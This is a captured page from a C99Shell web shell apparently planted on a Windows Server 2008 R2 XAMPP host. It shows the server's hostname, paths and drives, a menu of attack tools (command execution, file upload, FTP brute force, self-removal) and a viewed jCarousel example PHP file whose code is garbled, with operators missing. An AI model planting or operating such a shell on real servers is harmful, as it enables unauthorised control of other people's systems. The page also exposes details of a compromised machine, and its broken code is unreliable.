!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\phpold\js\jcarousel\examples\   drwxrwxrwx
Free 8.79 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     dynamic_ajax_php.php (1.22 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

// Array indexes are 0-based, jCarousel positions are 1-based.
$first max(0intval($_GET['first']) - 1);
$last  max($first 1intval($_GET['last']) - 1);

$length $last $first 1;

// ---

$images = array(
    
'http://static.flickr.com/66/199481236_dc98b5abb3_s.jpg',
    
'http://static.flickr.com/75/199481072_b4a0d09597_s.jpg',
    
'http://static.flickr.com/57/199481087_33ae73a8de_s.jpg',
    
'http://static.flickr.com/77/199481108_4359e6b971_s.jpg',
    
'http://static.flickr.com/58/199481143_3c148d9dd3_s.jpg',
    
'http://static.flickr.com/72/199481203_ad4cdcf109_s.jpg',
    
'http://static.flickr.com/58/199481218_264ce20da0_s.jpg',
    
'http://static.flickr.com/69/199481255_fdfe885f87_s.jpg',
    
'http://static.flickr.com/60/199480111_87d4cb3e38_s.jpg',
    
'http://static.flickr.com/70/229228324_08223b70fa_s.jpg',
);

$total    count($images);
$selected array_slice($images$first$length);

// ---

header('Content-Type: text/xml');

echo 
'<data>';

// Return total number of images so the callback
// can set the size of the carousel.
echo '  <total>' $total '</total>';

foreach (
$selected as $img) {
    echo 
'  <image>' $img '</image>';
}

echo 
'</data>';

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0624 ]--